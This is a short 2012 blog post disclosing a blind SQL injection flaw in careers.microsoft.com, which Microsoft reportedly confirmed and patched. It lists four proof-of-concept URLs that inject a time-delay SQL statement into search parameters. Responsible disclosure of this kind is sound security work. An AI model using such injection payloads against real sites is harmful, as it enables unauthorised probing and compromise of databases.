Thursday, July 12, 2012

Microsoft Bug #2: Blind SQL Injection Vulnerability Found in careers.microsoft.com

Description
Sow Ching Shiong, an independent vulnerability researcher has discovered a Blind SQL Injection vulnerability in careers.microsoft.com, which can be exploited by an attacker to conduct Blind SQL injection attacks.

Proof of concept URLs which will cause a time delay of 25 seconds are provided below:
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • http://careers.microsoft.com/Feed/Search.ashx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=all&dv=1));WAITFOR DELAY '0:0:25'--&ct=all&rg=all&lang=en
  • https://careers.microsoft.com/search.aspx?ss=xss&jc=all&pr=1));WAITFOR DELAY '0:0:25'--&dv=all&ct=all&rg=all&lang=en


Conclusion
This vulnerability has been confirmed and patched by Microsoft Security Team. I would like to thank them for their quick response to my report.

Microsoft White Hat

http://technet.microsoft.com/en-us/security/cc308575